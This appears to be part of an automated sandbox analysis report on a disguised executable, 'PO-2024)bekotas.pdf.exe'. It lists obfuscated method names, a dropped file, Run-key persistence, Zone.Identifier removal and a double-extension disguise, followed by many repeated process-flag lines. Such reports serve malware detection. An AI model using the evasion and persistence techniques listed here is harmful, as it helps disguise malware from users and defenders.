                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, hQpU9npdBUdS3OSUKn.csHigh entropy of concatenated method names: 'rTWE699HDC', 'syiEoHspF2', 'xIcEmxeF6h', 'MTxEOIUmU5', 'dA3EPmKCAd', 'gs2EfGxk7D', 'grKEUF2kiJ', 'o70EAOFjU4', 'YDuEZSVhok', 'x69EwlrClA'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, myCkX99QhGioe2eWNK.csHigh entropy of concatenated method names: 'e83cCMVJyG', 'LIsckkAHw1', 'xj9rlknLZv', 'KVvrPt130S', 'VOtrftLPTb', 'srLrKiFDa2', 'SAYrUPerTp', 'y3CrAIyZTb', 'dl4rqu1Nsl', 'UlTrZAxCNQ'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, nDwARLBnayTnwnH41L.csHigh entropy of concatenated method names: 'CRPF8E2KK', 'WZbaLk2dC', 'Suleihp2A', 'wt7kV1uJh', 'AaLoUM5C8', 'PyL93qeDa', 'h9V63WGpZdwe4wfIMt', 'afl8ovv6APtUop8CeL', 'cvF39mLbv', 'g8YTonqJd'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, UOmCBgHViOwVNaPQBr.csHigh entropy of concatenated method names: 'H118uq4iZf', 'pUX829qLU0', 'vim8Sva7V5', 'Gpg8rsuycJ', 'IbZ8cnxRlj', 'GRd8XHCoNv', 'mXe8gx8mfG', 'E018H8PHLA', 'fcD8nTVNIG', 'WFX8d5pEP8'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, A5ayCPmpCKiHfhIcHo.csHigh entropy of concatenated method names: 'YosXuFY1k1', 'VPOXSkrLZ6', 'SaAXcy3CMB', 'IEPXgnfl5g', 'iKFXHpUMYq', 'VJacJij7dQ', 'TOCctlxHQs', 'H9bcsStifx', 'vfhcioiNUj', 'M8rcD4g5BV'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, pC0y8FxliMCOFKsYwd.csHigh entropy of concatenated method names: 's0fVgyYiKU', 'glsVHcMNsP', 'QXeVdqNZQq', 'zc9VWNdyCk', 'feWVLNKa5a', 'yCPV4pCKiH', 'rq0vCSS6Ka0rCd9aeZ', 'jXc8bN1GTtd1BA4XKo', 'NtnVVdX3go', 'XcEV8K1jGq'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, GECskxqS5j9DrSYNHS.csHigh entropy of concatenated method names: 'DNTg7hV3y3', 'Wcbgywj4gN', 'nkqgFdvu5h', 'bWNga7ijSy', 'jBngC4sA9B', 'o9JgenHJM6', 'NC0gkqGtbV', 'BVdg67b3Oa', 'AbpgopQpVv', 'RWVg91fpTi'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, JyYiKU6SlscMNsPmbd.csHigh entropy of concatenated method names: 'BIeS1NGNn8', 'MckSM0ZtCf', 's8YSjCTeNv', 'npyShLLEZG', 'FJ1SJFYOm6', 'gIoSte4Mxx', 'KiiSsmYmrP', 'ov8Sigomay', 'oBtSD0YheW', 'pI8SQn5Fxe'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, d3xfOjSskEscOYP7bG.csHigh entropy of concatenated method names: 'Dispose', 'h1vVDb2vDI', 'uPUBO4GEs1', 'whHaaxv8Yi', 'E7sVQBB4ZT', 'rmjVzNjpuW', 'ProcessDialogKey', 'eb4BRSKOB9', 'eoTBVB3Cso', 'hvMBBSR6aG'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, JlyuJKV8Owx8Lf9RDcw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bo7T1yhSWB', 'Ul8TM4pbjl', 'DMvTjk76l7', 'eqYTh0BE2j', 'fefTJ4umIt', 'owoTtLtiOM', 'NlrTsC8IWx'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, B9J5yi1Jym2nqaMIZ0.csHigh entropy of concatenated method names: 'ruALZLsSXO', 'TGHL02hyuk', 'x8AL1lHmmn', 'hydLMOIOHX', 'LCLLOwcVFS', 'pHULl3ELeF', 'lnWLPa8BXp', 'yb9LfiPtGg', 'oVeLKVU2aC', 'JqsLU26Jqx'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, sODLhptNV6yYwU1XFD.csHigh entropy of concatenated method names: 'u4gbiUahQn', 'qagbQq45Yp', 'p8Q3RDnWT1', 'mgy3VLcJPE', 'SWGbwStRpT', 'aD3b0YWDaC', 'JTAbpQl8WR', 'bBrb1dTZbl', 'jUcbMd7tvI', 'YGdbjxOyyJ'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, I86VotVRRhYSMqB6Frk.csHigh entropy of concatenated method names: 'ctk57cKslF', 'b1u5yKuMfe', 'uhK5Fshnv9', 'zOb5aIm3xh', 'HSi5CNGGj1', 'bwP5eAaEZs', 'kcq5kHXVDf', 'LeG563aOB5', 'Y2N5oZv4ov', 'Kjd59Ijki6'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, JBTdvCjksnJPGHlLaY.csHigh entropy of concatenated method names: 'ToString', 'XyF4w6QIbl', 'HjZ4OtHrjn', 'bec4lMBAwr', 'T064PUu6M0', 'CLu4f3J9ye', 'bZN4KRrmVk', 'h1W4UWkyKq', 'kFO4AZu4oZ', 'zIM4qe0LJh'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, VEQZVTU3wZMqQixHDl.csHigh entropy of concatenated method names: 'CHkg2C6yDY', 'WGFgr5H8PJ', 'tJqgXRISnf', 'ubkXQU1ajO', 'zmvXzFILIY', 'eBagRmas14', 'X4DgVguEBL', 'q1hgBBRIqq', 'pG2g81Oo8K', 'VGwgxGUv7O'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, VhI1myhJdlPZw3gjUD.csHigh entropy of concatenated method names: 'mlubdxj8mV', 'xbTbW3TU4X', 'ToString', 'cBPb2U5kdJ', 'Mw7bSS8M6l', 'BpMbr7e4gE', 'XqYbcjNFW9', 'HdwbXnTDHT', 'HddbgmaPdu', 'Ae6bHyDr9O'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, pSKOB9DuoTB3CsocvM.csHigh entropy of concatenated method names: 'eX93mB0WyQ', 'OGd3OcMwkN', 'rdk3lvgCMi', 'BDe3PHQGyo', 'elW315Q5lr', 'vbP3fjsZcA', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, mqgPgfzf11OAh2XEHP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ICv5EH8UCi', 'XN95L7fbsS', 'rJb5417mf2', 'wSD5bNRheS', 'Scd53WflMG', 'ViF558pi39', 'ftw5TJVEx4'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, gR6aGTQnxZi34rhdVO.csHigh entropy of concatenated method names: 'itc5Vp3v2w', 'rR758hC8vx', 'GkJ5xQbaPK', 'Fkb5286v2C', 'xdt5SlnEqS', 'yEr5cxromp', 'ss55XQQN4g', 'jdy3s5oNR6', 'H0I3ipfZf2', 'jZG3DWMdsp'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, ysBB4ZiT3mjNjpuWub.csHigh entropy of concatenated method names: 'vAK32ON2IB', 'KiM3SnGLpj', 'K7C3rP7Gox', 'rBw3c5K84T', 'SV23X5ubNo', 'Ilp3grDNl7', 'n9r3HLpnpM', 'rGm3npDedM', 'T9K3dPij6s', 'hSa3WQC7HU'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, pHwrk1oXeqNZQqFc9N.csHigh entropy of concatenated method names: 'EG6rayBj6g', 'AZSreYQAFX', 'h44r6dCQsr', 'jGHroNXtBK', 'ShbrLCisAj', 'hjar4Paa5A', 'Jw4rb5vYuX', 'xewr3EGaao', 'ekQr5CC2oj', 'fcJrTpjFwn'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, hQpU9npdBUdS3OSUKn.csHigh entropy of concatenated method names: 'rTWE699HDC', 'syiEoHspF2', 'xIcEmxeF6h', 'MTxEOIUmU5', 'dA3EPmKCAd', 'gs2EfGxk7D', 'grKEUF2kiJ', 'o70EAOFjU4', 'YDuEZSVhok', 'x69EwlrClA'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, myCkX99QhGioe2eWNK.csHigh entropy of concatenated method names: 'e83cCMVJyG', 'LIsckkAHw1', 'xj9rlknLZv', 'KVvrPt130S', 'VOtrftLPTb', 'srLrKiFDa2', 'SAYrUPerTp', 'y3CrAIyZTb', 'dl4rqu1Nsl', 'UlTrZAxCNQ'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, nDwARLBnayTnwnH41L.csHigh entropy of concatenated method names: 'CRPF8E2KK', 'WZbaLk2dC', 'Suleihp2A', 'wt7kV1uJh', 'AaLoUM5C8', 'PyL93qeDa', 'h9V63WGpZdwe4wfIMt', 'afl8ovv6APtUop8CeL', 'cvF39mLbv', 'g8YTonqJd'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, UOmCBgHViOwVNaPQBr.csHigh entropy of concatenated method names: 'H118uq4iZf', 'pUX829qLU0', 'vim8Sva7V5', 'Gpg8rsuycJ', 'IbZ8cnxRlj', 'GRd8XHCoNv', 'mXe8gx8mfG', 'E018H8PHLA', 'fcD8nTVNIG', 'WFX8d5pEP8'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, A5ayCPmpCKiHfhIcHo.csHigh entropy of concatenated method names: 'YosXuFY1k1', 'VPOXSkrLZ6', 'SaAXcy3CMB', 'IEPXgnfl5g', 'iKFXHpUMYq', 'VJacJij7dQ', 'TOCctlxHQs', 'H9bcsStifx', 'vfhcioiNUj', 'M8rcD4g5BV'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, pC0y8FxliMCOFKsYwd.csHigh entropy of concatenated method names: 's0fVgyYiKU', 'glsVHcMNsP', 'QXeVdqNZQq', 'zc9VWNdyCk', 'feWVLNKa5a', 'yCPV4pCKiH', 'rq0vCSS6Ka0rCd9aeZ', 'jXc8bN1GTtd1BA4XKo', 'NtnVVdX3go', 'XcEV8K1jGq'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, GECskxqS5j9DrSYNHS.csHigh entropy of concatenated method names: 'DNTg7hV3y3', 'Wcbgywj4gN', 'nkqgFdvu5h', 'bWNga7ijSy', 'jBngC4sA9B', 'o9JgenHJM6', 'NC0gkqGtbV', 'BVdg67b3Oa', 'AbpgopQpVv', 'RWVg91fpTi'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, JyYiKU6SlscMNsPmbd.csHigh entropy of concatenated method names: 'BIeS1NGNn8', 'MckSM0ZtCf', 's8YSjCTeNv', 'npyShLLEZG', 'FJ1SJFYOm6', 'gIoSte4Mxx', 'KiiSsmYmrP', 'ov8Sigomay', 'oBtSD0YheW', 'pI8SQn5Fxe'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, d3xfOjSskEscOYP7bG.csHigh entropy of concatenated method names: 'Dispose', 'h1vVDb2vDI', 'uPUBO4GEs1', 'whHaaxv8Yi', 'E7sVQBB4ZT', 'rmjVzNjpuW', 'ProcessDialogKey', 'eb4BRSKOB9', 'eoTBVB3Cso', 'hvMBBSR6aG'
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeFile created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJump to dropped file
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwTJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwTJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeFile opened: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Uses an obfuscated file name to hide its real file extension (double extension)
                    Source: Possible double extension: pdf.exeStatic PE information: PO-2024)bekotas.pdf.exe
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
